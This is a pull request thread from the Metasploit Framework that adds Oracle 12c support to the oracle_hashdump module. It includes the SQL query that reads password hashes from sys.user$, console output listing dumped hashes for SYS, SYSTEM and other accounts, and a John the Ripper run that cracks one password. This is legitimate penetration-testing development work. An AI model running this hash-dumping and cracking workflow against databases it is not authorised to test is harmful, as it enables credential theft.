### PR TITLE
Add 12c support for oracle_hashdump

### PR DESCRIPTION
**Pull request by 7043mcgeep**
Resolves issue #11294 
This change adds (and verifies) support for Oracle DB version 12c in `oracle_hashdump`. The module now handles each Oracle DB version separately, and does not assume the database version by default. Documentation added as `documentation/modules/auxiliary/oracle/oracle_hashdump.rb`

## Verification

- [x] Start `msfconsole`
- [x] `use auxiliary/scanner/oracle/oracle_hashdump`
- [ ] Make sure Oracle 12c DB is running
- [ ] Make sure DBUSER (oracle 12c user) has proper privileges to select from sys.user$ table

```
msf5 auxiliary(scanner/oracle/oracle_hashdump) > info

       Name: Oracle Password Hashdump
     Module: auxiliary/scanner/oracle/oracle_hashdump
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  theLightCosine <theLightCosine@metasploit.com>

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  DBPASS   Hunter18         yes       The password to authenticate with.
  DBUSER   system           yes       The username to authenticate with.
  RHOST    192.168.6.200    yes       The Oracle host.
  RHOSTS   192.168.6.200    yes       The target address range or CIDR identifier
  RPORT    1521             yes       The TNS port.
  SID      msf18            yes       The sid to authenticate with.
  THREADS  1                yes       The number of concurrent threads

Description:
  This module dumps the usernames and password hashes from Oracle
  given the proper Credentials and SID. These are then stored as creds
  for later cracking using auxiliary/analyze/jtr_oracle_fast. This
  module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.

  ```
  
With 18c stub and running Oracle 18c:
  ```
msf5 auxiliary(scanner/oracle/oracle_hashdump) > run

[-] Version 18c is not currently supported
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/oracle/oracle_hashdump) >
```

Without 18c stub (behavior of unsupported version):
```
msf5 auxiliary(scanner/oracle/oracle_hashdump) > run

[-] Oracle DB version not supported.
This module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.
Dumping unsupported version info:
Oracle Database 18c Enterprise Edition Release 18.0.0.0.0 - Production,Oracle Database 18c Enterprise Edition Release 18.0.0.0.0 - Production
Version 18.3.0.0.0,Oracle Database 18c Enterprise Edition Release 18.0.0.0.0 - Production,0.0
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/oracle/oracle_hashdump) >
```
With 12c DB connected:
```
msf5 auxiliary(scanner/oracle/oracle_hashdump) > run

[*] Server is running 12c
[*] Hash table :
 Oracle Server Hashes
====================

 Username               Hash
 --------               ----
...
  SCOTT                  S:BF6D4E3791075A348BA76EF533E38F7211513CCE2A3513EE3E3D4A5A4DE0;H:3814C74599475EB73043A1211742EE59;T:0911BAC55EEF63F0C1769E816355BE29492C9D01980DC36C95A86C9CE47F93790631DE3D9A60C90451CFF152E25D9E94F612A1493EC82AF8E3C4D0432B06BA4C2C693B932332BC14D2D66CEF098A4699
...

[+] Hash Table has been saved
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/oracle/oracle_hashdump) > creds
Credentials
===========

host       origin     service            public  private                                                                                                                                                                                                                                                               realm  private_type        JtR Format
----       ------     -------            ------  -------      
...                                                                                                                                                                                                                                                         -----  ------------        ----------
127.0.0.1  127.0.0.1  1522/tcp (oracle)  SCOTT   S:BF6D4E3791075A348BA76EF533E38F7211513CCE2A3513EE3E3D4A5A4DE0;H:3814C74599475EB73043A1211742EE59;T:0911BAC55EEF63F0C1769E816355BE29492C9D01980DC36C95A86C9CE47F93790631DE3D9A60C90451CFF152E25D9E94F612A1493EC82AF8E3C4D0432B06BA4C2C693B932332BC14D2D66CEF098A4699         Nonreplayable hash  oracle12c
...
```

The 12c hashes (saved as `creds`) can then be cracked using `jtr_oracle_fast`, which already supports conversion of 12c hash into acceptable JTR format:

```
[*] Cracking oracle12c hashes in normal wordlist mode...
Using default input encoding: UTF-8
[*] Cracking oracle12c hashes in single mode...
Using default input encoding: UTF-8
[*] Cracked passwords this run:
[+] SCOTT:hunter2
```

### CODE REVIEW

**Comment by h00die** [comment]
Instead of having `is_11g` and `is_12c` variables, and having to check both, why not just do a string comparison.
`version = '11g'` or `version='12c'` and then you can use a case switch with a default for <11g.  May just simplify the code a bit and will definitely make future changes easier.

**Comment by h00die** [comment]
Would you mind adding some docs too?  You should be able to pull all the info from your posts already:
https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md

Don't feel obligated to document the pre-12c stuff you didn't add.  I can do that in a future PR looking back to find the old posts.

**Comment by bcoles** [comment]
> 
> 
> Instead of having `is_11g` and `is_12c` variables, and having to check both, why not just do a string comparison.

Agreed, but I'd go a step further.

This entire module is spaghetti, and will only ever get worse, exponentially, with the release of each version.

It needs to be redesigned. Both the `run_host` and `report_hashes` methods smell.

This situation exists because the original author made the false assumption that Oracle will never release a version after 11g. This PR suffers the same presumption, only for 12c.

Passing `is_11` and `is_12` around as Booleans is madness and should be avoided.

> `version = '11g'` or `version='12c'` and then you can use a case switch with a default for <11g. May just simplify the code a bit and will definitely make future changes easier.

`<11` should be handled separately, not as default. The module should fail upon unknown versions citing an unknown version as the cause.

For example, Oracle 18c was released over a year ago, which will obviously cause issues. Apparently naming conventions and semantic versioning are for suckers.

Apparently 19c is next, but I've received conflicting information about the following release. My taxi driver reckons we'll see *Oracle 2020 'sun killer' Anniversary Edition* in 2020; but my Uber driver thinks the next release will be *Oracle One*.

At first I laughed, but then I read [what Oracle had to say](http://oracle-help.com/articles/naming-convention-oracle-18c/) and now I'm not so sure.

**Comment by bcoles** [comment]
Here's some unofficial info about 18c hash formats:

* http://www.petefinnigan.com/weblog/archives/00001435.htm

**Comment by 7043mcgeep** [comment]
Basically nodding my head in agreement with everything said above. Making corresponding updates to the module. Will add docs.

> Here's some unofficial info about 18c hash formats:
> 
> http://www.petefinnigan.com/weblog/archives/00001435.htm

Very helpful link. Explains my results over at #11624 

> Don't feel obligated to document the pre-12c stuff you didn't add. I can do that in a future PR looking back to find the old posts.

Cool, let's talk about that. Today I learned version "8g" does not exist -- it's called 8i for "Internet", which sounds old because it is old. As far as I can tell, this too-old-for-anyone-to-notice-or-care 8g has been sitting in this module since its creation.
Cleaning up this module and handling each version of oracle separately, the individual supported versions look like this:
`8i, 9i, 10g, 11g, 12c,`

While I can't really test that "8i" works, I think removing "8g" is unnecessary since 10g isn't going anywhere, and 8i and 10g use the same DES hashing. Are we in agreement there?

**Comment by h00die** [comment]
I'm good with it.
Feel free to stub in a '18c' with a `print_error('18c not currently supported')`

**Comment by 7043mcgeep** [comment]
Updated the module and added a doc. Also refreshed my original post (above) with most updated behavior. Suggestions welcome.

**Comment by h00die** [comment]
my first attempt at getting oracle integration was a failure.
I'll try again in a day or two

File: documentation/modules/auxiliary/scanner/oracle/oracle_hashdump.md [hunk 1]
```diff
@@ -0,0 +1,108 @@
...
+  2. On your Oracle DB machine, make sure you can ping the DB server using the `tnsping [SID]`
+  3. Make sure to create a user on the DB that has a known password, and sufficient privileges to select any table. This is necessary for getting the hashes.
+  4. Test that the module's hash query works locally. Once your user is created with sufficient privileges, connect to the DB as the user, and proceed to run this query if on 12c:
+     `SELECT name, spare4 FROM sys.user$ where password is not null and name <> \'ANONYMOUS\'` and this query if running an older version: `SELECT name, password FROM sys.user$ where password is not null and name<> \'ANONYMOUS\'`
+  5. Set up your MSF environment to support Oracle. You need gem ruby-oci8, as well as Oracle Instant Client. Tutorial here: https://github.com/rapid7/metasploit-framework/wiki/How-to-get-Oracle-Support-working-with-Kali-Linux
+  6. Make sure you have a database connected to MSF (postgresql). This can be done through `msfdb` tool or through `db_connect` command in `msfconsole`.
+
+## Verification Steps
+
+  Example steps in this format (is also in the PR):
```
Comment (h00die) [inline documentation/modules/auxiliary/scanner/oracle/oracle_hashdump.md]: can be removed

File: documentation/modules/auxiliary/scanner/oracle/oracle_hashdump.md [hunk 2]
```diff
@@ -0,0 +1,108 @@
...
+  5. You may view saved credentials with `creds` command. These are used for cracking by module `jtr_oracle_fast`.
+
+## Options
+  **DBPASS**
+  The password to authenticate with. Change this from TIGER to the password of the privileged user created in step 3 of Preparation.
+
+  **DBUSER**
+  The username to authenticate with. Change this from SCOTT to the user you created who is granted privileges to select from the sys.user$ table
+
+  **RHOST**
```
Comment (h00die) [inline documentation/modules/auxiliary/scanner/oracle/oracle_hashdump.md]: you can remove this varaible

File: documentation/modules/auxiliary/scanner/oracle/oracle_hashdump.md [hunk 3]
```diff
@@ -0,0 +1,108 @@
...
+  The Oracle host. Change this to the IP address of the DB server.
+
+  **RHOSTS**
```
Comment (h00die) [inline documentation/modules/auxiliary/scanner/oracle/oracle_hashdump.md]: can be removed

**Comment by 7043mcgeep** [comment]
@h00die There's a few changes I made to get it working (using 12c_2, unlike this tutorial: https://github.com/rapid7/metasploit-framework/wiki/How-to-get-Oracle-Support-working-with-Kali-Linux).

When installing Instant Client, make sure to get equivalents of Version 12.1.0.2.0.

Unzipped to my /opt/ as described (only it will be `instantclient_12_2`)

The step to symlink the shared library did not initially work for me as described; to actually show the link worked with `ls -lh`, I first had to run it with option `-s` (`ln -s libclntsh.so.[ver] libclntsh.so`). That did the trick.

Exported paths the same way, instead replacing `instantclient_12_1` with `instantclient_12_2`

Now for the less obvious part (to me, anyway). oci8-2.2.7 is the version that worked for me, not 2.1.8.
So do this wget for the source: `wget https://github.com/kubo/ruby-oci8/archive/ruby-oci8-2.2.7.zip` and compile.

Maybe this info would be helpful in a revision of the tutorial linked above?

Hope you can kick Oracle around enough for it to eventually start working.

**Comment by h00die** [comment]
As a side note, I updated the wiki page to now show everything for instantclient_12_2, and gem 2.2.7.  Good bye 2015, welcome 2019!

**Comment by h00die** [comment]
Also for the record, using the OLD version of this module (pre-pr) on Oracle XE 11.2 (windows 2012) gave the following (wrong) output:
```
msf5 auxiliary(scanner/oracle/oracle_hashdump) > run

[*] Server is running 11g, using newer methods...
[*] Hash table :
 Oracle Server Hashes
====================

 Username          Hash
 --------          ----
 APEX_040000       S:03D9B47D20C9A9EC3023177D80C0EE2D1DCEDA619215C2405177CEFFEE76
 APEX_PUBLIC_USER  S:E8D8CCD600CBCEA08ACB158A502C5DA711B00146404621BB2F83E8997246
 APPQOSSYS         S:4237CCB702887B049107EE6D13C312123F40E3F51208B2B70D6DA92E621D
 CTXSYS            S:3548FDA49F84F2F7ECE4635BA0FD714EC2446723074ED6167F1CD9B6EDFB
 DBSNMP            S:59354E99120C523F77232A8CCFDE5E780591FCE14109EEE2C86F4A9B4E8F
 DIP               S:1E4C37D0E8DC2E556D3C02A961ACEF1500B315D076BE13E578D1A28FC757
 FLOWS_FILES       S:A3657555975A9F7527C4B97637734D74465C592B9D231CA3DAB100ED5865
 HR                S:F437C1647EBCEB1D1FB4BB3D866953B4BF612B343944B899E061B361F31B
 MDSYS             S:F337C5D6300E3F8CDEDE0F2B2336415EAAE098A700A35E6731BF1370657E
 ORACLE_OCM        S:1575D1C89A1AACFE161ED788D2DC59CF6C57AE3B6CCC341D831AAF5BC447
 OUTLN             S:142AD444D8A63983FF69C77DBFD3E60947C14237AEC71031E24F5228D44C
 SYS               S:BFAF1ED5A8D39CC10D07DAF03A175C65198359874DAD92F081BE09B89162
 SYSTEM            S:D88BA08B353EC52E1EFD8433DF623773ACE3F81B7294BBC2E5C22CDD32F5
 XDB               S:88D6BE2B593143BD5AE5185C564826F9213E71361230D3360E36C3FF55D2
 XS$NULL           S:6C4F97FF654AE30BCD9BDBB3007EF952B5943F0A9ED491455E9FB185D8A1

[+] Hash Table has been saved
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

The hashes are cropped :( Good thing this PR exists!

**Comment by 7043mcgeep** [comment]
> ...
> The hashes are cropped :( Good thing this PR exists!

Are you saying this PR solves your cropped-hashes issue on version 11g?

If so, that's an unintended feature, because my change to treat each version as independently as possible (as you and bcoles suggested) still uses the same query as it always did.

My PR:
```
 when '11g', '12c'    # Get the usernames and hashes for 11g or 12c
        query='SELECT name, spare4 FROM sys.user$ where password is not null and name<> \'ANONYMOUS\''
```

Old version of the module:
```
 # Get the usernames and hashes for 11g
      else
        query='SELECT name, spare4 FROM sys.user$ where password is not null and name<> \'ANONYMOUS\''
```

**Comment by h00die** [comment]
Deleted post because I had a case of the dumbs. Done setting up msf and tested as working on 11.2, installing 18 now, will test in the next few days

**Comment by 7043mcgeep** [comment]
Cool. Were you able to test 12c?

**Comment by h00die** [comment]
## 18

Working as expected.

```
resource (oracle.rb)> use auxiliary/scanner/oracle/oracle_hashdump
resource (oracle.rb)> set rhosts 111.111.1.111
rhosts => 111.111.1.111
resource (oracle.rb)> set dbuser system
dbuser => system
resource (oracle.rb)> set dbpass oracle
dbpass => oracle
resource (oracle.rb)> set sid XE
sid => XE
resource (oracle.rb)> run
[-] Version 18c is not currently supported

```

File: modules/auxiliary/scanner/oracle/oracle_hashdump.rb [hunk 4]
```diff
@@ -25,22 +26,37 @@ def initialize
...
-    is_11g=false
+    # Checks for Version of Oracle. Behavior varies with oracle version.
+    # 12c uses SHA-512 (explained in more detail in report_hashes() below)
+    # 11g uses SHA-1 while 8i-10g use DES
     query =  'select * from v$version'
     ver = prepare_exec(query)
 
     if ver.nil?
-      print_error("An Error has occurred, check your OPTIONS")
+        print_error("An Error has occurred. Check your OPTIONS")
```
Comment (h00die) [inline modules/auxiliary/scanner/oracle/oracle_hashdump.rb]: why the 2 space indent?
Also, lets make this more informative on *where* in the process it failed.  Maybe something like "An error has occurred while querying for the Oracle version.  Please check your OPTIONS"

File: modules/auxiliary/scanner/oracle/oracle_hashdump.rb [hunk 5]
```diff
@@ -25,22 +26,37 @@ def initialize
...
+      when ver[0].include?('12c')
+        ver='12c'
+      when ver[0].include?('18c')
+        print_error("Version 18c is not currently supported")
+        return
+      else
+        print_error("Error: Oracle DB version not supported.\nThis module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.\nDumping unsupported version info:\n#{ver[0]}")
+        return
       end
+      print_status("Server is running version #{ver}")
```
Comment (h00die) [inline modules/auxiliary/scanner/oracle/oracle_hashdump.rb]: i think this should be a `vprint_status`

**Review by h00die — CHANGES_REQUESTED** [review]
These are my last review comments.
This module works as expected on 11, and 18.  I dont have a 12 to test it on, but the changes look sane to me.
With these last few things, I think this is good to land!

**Comment by 7043mcgeep** [comment]
@h00die Thanks for your persistent feedback

**Comment by h00die** [comment]
No need to do any includes for the verbose messages, its included for free.
Also did some slight changes to style for the docs.  While it looks like a lot, it was just a few spaces, and changing numbers etc.  Also I added on 11 and 18 to the docs since I was testing it anyways.

https://github.com/rapid7/metasploit-framework/commit/2a311931d3da2ffd80752df47594530ba3ca979a

**Comment by h00die** [comment]
As noted in https://github.com/rapid7/metasploit-framework/issues/11294#issuecomment-477358776 thanks for all the work you did on this, mighty fine effort to get everything working right, a big cleanup of this module for better future support, adding docs, testing JTR integration, helping me get my own oracle working (and by proxy updating the wiki page on it)!

**Comment by h00die** [comment]
# Release Notes
This PR adds oracle 12 support to the oracle_hashdumper module, as well as docs for the module

**Pull request merged**